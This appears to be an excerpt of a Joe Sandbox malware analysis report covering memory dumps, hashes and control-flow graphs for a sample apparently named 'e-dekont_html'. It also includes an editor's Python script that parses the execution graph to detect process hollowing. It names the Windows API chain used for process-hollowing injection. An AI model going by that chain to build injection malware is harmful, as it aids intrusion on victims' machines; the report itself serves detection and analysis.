                                                                                                                                                          • Opcode ID: 342b5ddd662554570b7e9b13368905d875811f2146dd7de9e7eb97d7f5059c76
                                                                                                                                                          • Instruction ID: a8a60204a60dca0e3e4adb1e97424018749a32a988d3d1af0e07f72d53471505
                                                                                                                                                          • Opcode Fuzzy Hash: 342b5ddd662554570b7e9b13368905d875811f2146dd7de9e7eb97d7f5059c76
                                                                                                                                                          • Instruction Fuzzy Hash: 691123317456128FCB199A2DC46852EBBA6FF9536530885A9E413CB3A4CF30CC028790
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e0f4f05e69aff6eef7332ce9d1e833a4d72acff15baccb2d678932fb09789090
                                                                                                                                                          • Instruction ID: 2a53b3e5362bf6fb0e69ae03c69cae3b7848c05ee4fb9854f99edba20130f907
                                                                                                                                                          • Opcode Fuzzy Hash: e0f4f05e69aff6eef7332ce9d1e833a4d72acff15baccb2d678932fb09789090
                                                                                                                                                          • Instruction Fuzzy Hash: D6110AB5D0110A9FDB44EFA8D98079EBBF1FB44304F10D5AAD014AB358EB705A45DB81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4159801798.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_128d000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                          • Instruction ID: b0f7668e7fedfa27093848ab17139710b019d8d3924f717c501c71938f7cb30e
                                                                                                                                                          • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                          • Instruction Fuzzy Hash: 0611DD75504288CFDB12DF54C9C4B15BFA2FB84314F24C6AAD9494B692C33AD44ACF62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 18d59a5f58cde9e4e948cbc463a1048ff0682802cadeb95fa240dae75c96810e
                                                                                                                                                          • Instruction ID: add13b26d6b444facd6046da62825f06c4ec7ddb9f56b566eed234816314370c
                                                                                                                                                          • Opcode Fuzzy Hash: 18d59a5f58cde9e4e948cbc463a1048ff0682802cadeb95fa240dae75c96810e
                                                                                                                                                          • Instruction Fuzzy Hash: 9E21A275D0120ACFCB00EFB9E9496EEBBF4FF09310F10466AD819B2214EB305A94CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ed79f51fb120a65fdd260086631d32cb4b3b7b65ccf95f3b821fa3fcd599cf39
                                                                                                                                                          • Instruction ID: 094ab8449ed608abf2e0c538d7c9a3fc8c061d30412f22420b82abc14b136ce2
                                                                                                                                                          • Opcode Fuzzy Hash: ed79f51fb120a65fdd260086631d32cb4b3b7b65ccf95f3b821fa3fcd599cf39
                                                                                                                                                          • Instruction Fuzzy Hash: 3601D472B002546FCF169EA49C14AEF3BA7EFC9354F158056F905CB284DF318D1697A0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3ccf735ac923d17beee2b9f66d94fd3cb3b468676740d49d80bc04b97b4db2cf
                                                                                                                                                          • Instruction ID: 46a87ca8b961fb01dddb8f011a5acb466b31af9d42fb7295f59230b17913ffe4
                                                                                                                                                          • Opcode Fuzzy Hash: 3ccf735ac923d17beee2b9f66d94fd3cb3b468676740d49d80bc04b97b4db2cf
                                                                                                                                                          • Instruction Fuzzy Hash: 52F096357406104B8B156A3E9C54B2AB6EEEFC8A5535540F9E90BC7365EF61CC06C790
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b03341e6584f2da5b5dd55151100965ab4f62ca98a199e9a26b2d76d49cb3a48
                                                                                                                                                          • Instruction ID: 815ff4cc9eb5fdb97ebd2bac54ff48b4baa839915857f578bb91b32169ebde73
                                                                                                                                                          • Opcode Fuzzy Hash: b03341e6584f2da5b5dd55151100965ab4f62ca98a199e9a26b2d76d49cb3a48
                                                                                                                                                          • Instruction Fuzzy Hash: 3C112979D0430AEFCB01DFA8E8449AEBBB1FB4A300F018466D910A3359E7305A15DF91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8c911a0da62b9682e7823b25350d947a1c4702c84813118e7975d9063865413e
                                                                                                                                                          • Instruction ID: 8b6e8cb8e169f7a7857314afc6b3decc8c0b6badf509a17d01659625d0c8eec2
                                                                                                                                                          • Opcode Fuzzy Hash: 8c911a0da62b9682e7823b25350d947a1c4702c84813118e7975d9063865413e
                                                                                                                                                          • Instruction Fuzzy Hash: BBE0C232D2022B97CB00EBA9EC008DEF738EE86220B808622D91033014EB302658C7E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7926a8ba6362f8b99166dce7ab25177a73bf1062ade499f860d157b83bc13450
                                                                                                                                                          • Instruction ID: eef81e55a18710681684a9a98b29a2baeac054be9c35fad894fcd2d0b64e3e16
                                                                                                                                                          • Opcode Fuzzy Hash: 7926a8ba6362f8b99166dce7ab25177a73bf1062ade499f860d157b83bc13450
                                                                                                                                                          • Instruction Fuzzy Hash: 76D05B35D2022B97CB01E7A5EC044DFF738EED6261B544626D91437154FB702659C6F1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3dbd29bbd9e82f5fe87c6e666f3e5cb63cf0f58191a6f85acab49538ad723237
                                                                                                                                                          • Instruction ID: f421b7838c66fbbdbe94d7d1b491c160e6cf36444b7b141823a96ebb10b46975
                                                                                                                                                          • Opcode Fuzzy Hash: 3dbd29bbd9e82f5fe87c6e666f3e5cb63cf0f58191a6f85acab49538ad723237
                                                                                                                                                          • Instruction Fuzzy Hash: 6FE05BB24083C10DC707E774BD794593F36EB41110B055E96D0444F65ADEB459469351
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3cac9d1062971cf4188e54db3074dd7a4eef5de8ab5fbc7e29b77079aaa59c4f
                                                                                                                                                          • Instruction ID: b67c60e630ee3b5b4476a1d998378407a7bfa4c2ce7d31be28a83cb0bdd0ada4
                                                                                                                                                          • Opcode Fuzzy Hash: 3cac9d1062971cf4188e54db3074dd7a4eef5de8ab5fbc7e29b77079aaa59c4f
                                                                                                                                                          • Instruction Fuzzy Hash: 1CD04275E44109CFCF20DFA8E4845DCBB71EB89321B10556AD926A3251D6305465CF11
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ccd5026405188548c573d9170cb8b72ffd78fa4acef3be31d4652386ec740c9a
                                                                                                                                                          • Instruction ID: 90b957d70a0010ddc58906f5efae448e8e2b952ab4e8c814fcd32735917cf21a
                                                                                                                                                          • Opcode Fuzzy Hash: ccd5026405188548c573d9170cb8b72ffd78fa4acef3be31d4652386ec740c9a
                                                                                                                                                          • Instruction Fuzzy Hash: E6D0673AB400189FCB049F98E8809DDF776FB98321B048516EA15A3265C6319925DB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67a204df37cade02be541bfb67e6c2bc70678b242799c734e6fcb9dafacb1e72
• Instruction ID: 575728434ea9c8d0aa7d442edf0d07970ba4e2755f0ad3cdc07609f4d58f1a7c
• Opcode Fuzzy Hash: 67a204df37cade02be541bfb67e6c2bc70678b242799c734e6fcb9dafacb1e72
• Instruction Fuzzy Hash: 7DC080314443094BC745F775FC95955376EFBC03147409F15B0050774DDE745C895791
Strings
Memory Dump Source
• Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: Xjq$Xjq$Xjq$Xjq
• API String ID: 0-2725347807
• Opcode ID: d26dc2da6a37ebcfac6ecdbf85e99e02b1fd8ebea230e595ebc5ed8c50c8bf7e
• Instruction ID: a9e3f2b733eacbd8c113b4a26e5f3be0c84f187768dd7b791683a64dbc5a7a5d
• Opcode Fuzzy Hash: d26dc2da6a37ebcfac6ecdbf85e99e02b1fd8ebea230e595ebc5ed8c50c8bf7e
• Instruction Fuzzy Hash: 54317275E042198BDF649F79C98037FB6BAEB48310F1444E9C816A7380DB708985CB92
Strings
Memory Dump Source
• Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: \;fq$\;fq$\;fq$\;fq
• API String ID: 0-4080798596
• Opcode ID: fbe4cd1026ee670c5cda6a2f0c84e98ad0cc9b71e312709d7ce80c6f76bb8ef0
• Instruction ID: bea686306c685cfb572672039d61d708046b5400d63b6c3b4f194f3d40eb48e9
• Opcode Fuzzy Hash: fbe4cd1026ee670c5cda6a2f0c84e98ad0cc9b71e312709d7ce80c6f76bb8ef0
• Instruction Fuzzy Hash: CD012139B101158FCF288E2DC584A2A77EEEFBC76471541A9E60ACB3A4DB31DC41C751

Execution Graph

Execution Coverage: 10.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 258
Total number of Limit Nodes: 11

The report renders the execution graph as an interactive node/edge diagram; the raw node list is omitted here. What it shows: from the entry at 7251ae0 the graph goes through 72517ec and the dispatchers 72534a0, 7253471, 7253516 and 72534b0 (all converging on 72534ca) into wrapper functions that call CreateProcessA (72513c4/72513d0), ReadProcessMemory (7251230/7251238), VirtualAllocEx (7251088/7251081), WriteProcessMemory (7251141/7251148), Wow64SetThreadContext (7250b70/7250b78) and ResumeThread (7250690/7250689). That is the process-hollowing API sequence: create a target process, read and overwrite its image, redirect its main thread and resume it; the Wow64 variant of SetThreadContext means the redirected thread belongs to a 32-bit process on 64-bit Windows. The remaining roots are unrelated to injection: 2b6d650 (DuplicateHandle), 2b6d000 (GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId), 72547a8 (PostMessageW via 7254a20/7254a28) and 2b64668 (CreateActCtxA via 2b644b4 and GetModuleHandleW via 2b6afa0).
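The graph data behind that diagram is a flat token stream (node id, hex address, optional API label, and `src->dst` edges), which is awkward to read but easy to mine. The following is an added example, not code from the report or from Joe Sandbox: it parses that token format, finds the root functions, collects the APIs reachable under each root, and checks the result against the hollowing chain named above. `GRAPH_EXCERPT` reproduces a subset of this sample's execution_graph tokens (the entry 7251ae0, its dispatcher 72534ca and the wrappers that reach the injection APIs, plus the DuplicateHandle root as a control); the token grammar is inferred from the dump rather than documented, and the `HOLLOWING_STAGES` table is the editor's own, not a Joe Sandbox signature.

```python
"""Parse a Joe Sandbox execution_graph token dump and test each root function's
reachable Win32 APIs against the process-hollowing chain.
Added example, not report or Joe Sandbox code. The grammar assumed here
(node = decimal id, 7-8 hex-digit address, optional label; edge = "src->dst")
is inferred from the dump, not documented."""
import re
from collections import defaultdict
from dataclasses import dataclass

ADDR = re.compile(r"[0-9a-f]{7,8}")

# Subset of this sample's execution_graph tokens (an excerpt, not a full graph).
GRAPH_EXCERPT = """
28427 7251ae0 28429 72517ec 28427->28429 28428 7251a3c 28429->28428 28434 72534a0 28429->28434
28435 72534ca 28434->28435 28447 72534d2 28435->28447 28503 72538dc 28435->28503 28521 7253b77 28435->28521
28554 7253ec1 28435->28554 28559 7254226 28435->28559 28544 7253c40 28435->28544 28447->28428
28504 72538eb 28503->28504 28505 72539d5 28504->28505 28574 72513c4 28504->28574
28575 72513cc CreateProcessA 28574->28575 28522 7253c0a 28521->28522 28616 7251088 28522->28616
28617 72510c8 VirtualAllocEx 28616->28617 28619 7251105 28617->28619 28523 7253c28 28619->28523
28525 7251141 WriteProcessMemory 28523->28525 28561 7250b70 Wow64SetThreadContext 28559->28561
28555 7253ec7 28554->28555 28557 7250690 ResumeThread 28555->28557
28545 7253cd6 28544->28545 28547 7251230 ReadProcessMemory 28545->28547
28742 2b6d650 DuplicateHandle 28743 2b6d6e6 28742->28743
"""


@dataclass
class Node:
    addr: str
    label: str      # "", a concrete API name, or an "N API calls" summary


def parse_execution_graph(text):
    """Return ({node_id: Node}, {src_id: [dst_id, ...]})."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(list)

    def starts_node(i):
        return (tokens[i].isdigit() and i + 1 < len(tokens)
                and ADDR.fullmatch(tokens[i + 1]) is not None)

    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->")
            edges[int(src)].append(int(dst))
            i += 1
        elif starts_node(i):
            nid, addr, i = int(tok), tokens[i + 1], i + 2
            label = []
            while i < len(tokens) and "->" not in tokens[i] and not starts_node(i):
                label.append(tokens[i])
                i += 1
            nodes[nid] = Node(addr, " ".join(label))
        else:
            i += 1      # stray token such as the leading "execution_graph"
    return nodes, dict(edges)


def roots(nodes, edges):
    """Ids of nodes with no incoming edge: the entry points the graph was built from."""
    targets = {d for dsts in edges.values() for d in dsts}
    return [n for n in nodes if n not in targets]


def api_sites(nodes, edges, root):
    """API name -> sorted addresses of nodes under `root` labelled with that API.
    "N API calls" summaries on intermediate nodes are skipped."""
    sites, seen, stack = defaultdict(set), set(), [root]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        node = nodes.get(n)
        if node is None:            # edge into a node outside the excerpt
            continue
        if node.label and not node.label.endswith("API calls"):
            sites[node.label].add(node.addr)
        stack.extend(edges.get(n, ()))
    return {api: sorted(addrs) for api, addrs in sites.items()}


# Hollowing in API order: create the target, allocate in it, write the payload
# image, point the main thread at the new entry, resume. Wow64SetThreadContext
# is the WOW64 form (32-bit target on 64-bit Windows). Editor's own table.
HOLLOWING_STAGES = (
    ("CreateProcessA", "CreateProcessW"),
    ("VirtualAllocEx",),
    ("WriteProcessMemory",),
    ("Wow64SetThreadContext", "SetThreadContext"),
    ("ResumeThread",),
)


def missing_hollowing_stages(apis):
    """Stages with no API present in `apis`; [] means the whole chain is reachable."""
    return [alts[0] for alts in HOLLOWING_STAGES
            if not any(a in apis for a in alts)]


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_EXCERPT)
    for r in roots(nodes, edges):
        sites = api_sites(nodes, edges, r)
        missing = missing_hollowing_stages(sites)
        verdict = "hollowing chain complete" if not missing else f"missing {missing}"
        print(f"root {nodes[r].addr}: {verdict}; APIs {sorted(sites)}")
```

Run on the excerpt, the 7251ae0 root reports the full chain (plus ReadProcessMemory) while the 2b6d650 root reports only DuplicateHandle. Reachability is a set check, not an order check: it answers "does this entry point reach every hollowing primitive", which is the triage question; confirming the call order needs the per-process API trace rather than the graph.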

Control-flow Graph

Control-flow graph of the function at 72334b8 (basic blocks from 72334b8-72334e0 up to 7233d0d-7233d14), rendered in the report as an interactive diagram with an Executed / Not Executed legend; the basic-block and edge list is omitted here.
Strings
Memory Dump Source
• Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
Similarity
• API ID:
• String ID: 4'fq$:$pjq$~
• API String ID: 0-2740937384
• Opcode ID: 2911af16740678f44173135ad9b31d93780403d2b1f264af521a437048d71033
• Instruction ID: 6bc0d8eb7ff258f841a80e786f774aebc9f775080c5d8c8725545375a407da01
• Opcode Fuzzy Hash: 2911af16740678f44173135ad9b31d93780403d2b1f264af521a437048d71033
• Instruction Fuzzy Hash: 7542F2B5A10219DFDB15CFA9C984B99BBB2FF49300F1580E9E509AB262D731DE91DF00

Control-flow Graph

Control-flow graph of the function entered at 7232106 (basic blocks spanning 72320c6 to 7232acd-7232adf), rendered in the report as an interactive diagram with an Executed / Not Executed legend; the basic-block and edge list is omitted here.
Strings
Memory Dump Source
• Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
Similarity
• API ID:
• String ID: D
• API String ID: 0-2746444292
• Opcode ID: 43921c6832507f1b103230e5686f22b2c1443351406b5063808becac9ae75e22
• Instruction ID: f7060b40274c2688ff6800cfe802925ceb50beb949600224531de3288b07c2c1
• Opcode Fuzzy Hash: 43921c6832507f1b103230e5686f22b2c1443351406b5063808becac9ae75e22
• Instruction Fuzzy Hash: C152A878A102298FCB64DF68D998BD9BBB2BF89310F1041D9D509A7365CB34AE81CF50

Control-flow Graph

Control-flow graph of the function at 7232c38 (basic blocks spanning 7232c38 to 7233130-7233137), rendered in the report as an interactive diagram with an Executed / Not Executed legend; the basic-block and edge list is omitted here. Call sites recovered from the graph: 7233020 calls 7233d21, 7233d30 or 7233d9e; 7233067 calls 72343b0 or 72343c0; 723308a calls 7236c28 or 7236c18; 723309f calls 7237f41, 7237f50 or 7237ef9; 72330b7 calls 72383c8 or 72383d8; 72330c9 calls 72384fa or 7238508; 72330e3 calls 7254730 or 7254740; 7233100 calls 72332c1 or 72332d0.
Strings
Memory Dump Source
• Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$4'fq$4|kq$4|kq$$fq
• API String ID: 0-863915177
• Opcode ID: 645549bc992bb9f9e69e7a14cf0af56c847d347a2c5d04d2a433ec18f1146d64
• Instruction ID: 97480a688ea41ad1df6fda9a08311d71b85fff87c0119194aa919a3d9ddf2cdf
• Opcode Fuzzy Hash: 645549bc992bb9f9e69e7a14cf0af56c847d347a2c5d04d2a433ec18f1146d64
• Instruction Fuzzy Hash: BCE1DDF5B2021ACFCB18DF78D8586AE7BE6BF89610B154469E406DB3A1DF70CC418B90

Control-flow Graph
control_flow_graph 452 2b6cff1-2b6d08f GetCurrentProcess 456 2b6d091-2b6d097 452->456 457 2b6d098-2b6d0cc GetCurrentThread 452->457 456->457 458 2b6d0d5-2b6d109 GetCurrentProcess 457->458 459 2b6d0ce-2b6d0d4 457->459 460 2b6d112-2b6d12d call 2b6d5d9 458->460 461 2b6d10b-2b6d111 458->461 459->458 465 2b6d133-2b6d162 GetCurrentThreadId 460->465 461->460 466 2b6d164-2b6d16a 465->466 467 2b6d16b-2b6d1cd 465->467 466->467
APIs
• GetCurrentProcess.KERNEL32 ref: 02B6D07E
• GetCurrentThread.KERNEL32 ref: 02B6D0BB
• GetCurrentProcess.KERNEL32 ref: 02B6D0F8
• GetCurrentThreadId.KERNEL32 ref: 02B6D151
Memory Dump Source
• Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 42b144b4251c017fabd5fc0b955df93284e8151e04b7bbd4dbfcab9e02d7c8c9
• Instruction ID: f51219a0683e54c4dcc517f56065e315105bdbc2b02db7f678890b7e6b0836a4
• Opcode Fuzzy Hash: 42b144b4251c017fabd5fc0b955df93284e8151e04b7bbd4dbfcab9e02d7c8c9
• Instruction Fuzzy Hash: 825159B0900349CFDB14DFA9C688BAEBBF1EF48314F248459E419A7290DB785984CF65

Control-flow Graph
control_flow_graph 474 2b6d000-2b6d08f GetCurrentProcess 478 2b6d091-2b6d097 474->478 479 2b6d098-2b6d0cc GetCurrentThread 474->479 478->479 480 2b6d0d5-2b6d109 GetCurrentProcess 479->480 481 2b6d0ce-2b6d0d4 479->481 482 2b6d112-2b6d12d call 2b6d5d9 480->482 483 2b6d10b-2b6d111 480->483 481->480 487 2b6d133-2b6d162 GetCurrentThreadId 482->487 483->482 488 2b6d164-2b6d16a 487->488 489 2b6d16b-2b6d1cd 487->489 488->489
APIs
• GetCurrentProcess.KERNEL32 ref: 02B6D07E
• GetCurrentThread.KERNEL32 ref: 02B6D0BB
• GetCurrentProcess.KERNEL32 ref: 02B6D0F8
• GetCurrentThreadId.KERNEL32 ref: 02B6D151
Memory Dump Source
• Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: d2b9375c58bc0580b5b3fdc7738acccc8c7e2da335fc508d7e9eedde4473501a
• Instruction ID: 92e7ea00341f98c3b220a912df79cc9a0b7bbdd5f62fbc07bc56d6574dcd9e60
• Opcode Fuzzy Hash: d2b9375c58bc0580b5b3fdc7738acccc8c7e2da335fc508d7e9eedde4473501a
• Instruction Fuzzy Hash: 965169B09003499FDB14DFA9CA88BAEBBF5EF48314F208459E419A7390DB785984CF65

Control-flow Graph
control_flow_graph 782 72513c4-72513ca 783 72513d1-7251465 782->783 784 72513cc-72513cf 782->784 786 7251467-7251471 783->786 787 725149e-72514be 783->787 784->783 786->787 788 7251473-7251475 786->788 794 72514f7-7251526 787->794 795 72514c0-72514ca 787->795 789 7251477-7251481 788->789 790 7251498-725149b 788->790 792 7251485-7251494 789->792 793 7251483 789->793 790->787 792->792 796 7251496 792->796 793->792 803 725155f-7251619 CreateProcessA 794->803 804 7251528-7251532 794->804 795->794 797 72514cc-72514ce 795->797 796->790 798 72514f1-72514f4 797->798 799 72514d0-72514da 797->799 798->794 801 72514dc 799->801 802 72514de-72514ed 799->802 801->802 802->802 805 72514ef 802->805 815 7251622-72516a8 803->815 816 725161b-7251621 803->816 804->803 806 7251534-7251536 804->806 805->798 808 7251559-725155c 806->808 809 7251538-7251542 806->809 808->803 810 7251544 809->810 811 7251546-7251555 809->811 810->811 811->811 813 7251557 811->813 813->808 826 72516b8-72516bc 815->826 827 72516aa-72516ae 815->827 816->815 829 72516cc-72516d0 826->829 830 72516be-72516c2 826->830 827->826 828 72516b0 827->828 828->826 832 72516e0-72516e4 829->832 833 72516d2-72516d6 829->833 830->829 831 72516c4 830->831 831->829 835 72516f6-72516fd 832->835 836 72516e6-72516ec 832->836 833->832 834 72516d8 833->834 834->832 837 7251714 835->837 838 72516ff-725170e 835->838 836->835 840 7251715 837->840 838->837 840->840
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07251606
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 9a4d1b31d8e70aa5b68bb2f16de7e3dfe993716793564c097822211195f346ca
• Instruction ID: 2a88ab91f370d327851ce91cd52ff9e4ea68110079a9ba0efe7a6bd5cee6ef8a
• Opcode Fuzzy Hash: 9a4d1b31d8e70aa5b68bb2f16de7e3dfe993716793564c097822211195f346ca
• Instruction Fuzzy Hash: 02A14BB1D1021EDFDF24CFA8C941BADBBB2BF48310F148569E809A7250DB749995CF91

Control-flow Graph
control_flow_graph 841 72513d0-7251465 844 7251467-7251471 841->844 845 725149e-72514be 841->845 844->845 846 7251473-7251475 844->846 852 72514f7-7251526 845->852 853 72514c0-72514ca 845->853 847 7251477-7251481 846->847 848 7251498-725149b 846->848 850 7251485-7251494 847->850 851 7251483 847->851 848->845 850->850 854 7251496 850->854 851->850 861 725155f-7251619 CreateProcessA 852->861 862 7251528-7251532 852->862 853->852 855 72514cc-72514ce 853->855 854->848 856 72514f1-72514f4 855->856 857 72514d0-72514da 855->857 856->852 859 72514dc 857->859 860 72514de-72514ed 857->860 859->860 860->860 863 72514ef 860->863 873 7251622-72516a8 861->873 874 725161b-7251621 861->874 862->861 864 7251534-7251536 862->864 863->856 866 7251559-725155c 864->866 867 7251538-7251542 864->867 866->861 868 7251544 867->868 869 7251546-7251555 867->869 868->869 869->869 871 7251557 869->871 871->866 884 72516b8-72516bc 873->884 885 72516aa-72516ae 873->885 874->873 887 72516cc-72516d0 884->887 888 72516be-72516c2 884->888 885->884 886 72516b0 885->886 886->884 890 72516e0-72516e4 887->890 891 72516d2-72516d6 887->891 888->887 889 72516c4 888->889 889->887 893 72516f6-72516fd 890->893 894 72516e6-72516ec 890->894 891->890 892 72516d8 891->892 892->890 895 7251714 893->895 896 72516ff-725170e 893->896 894->893 898 7251715 895->898 896->895 898->898
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07251606
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
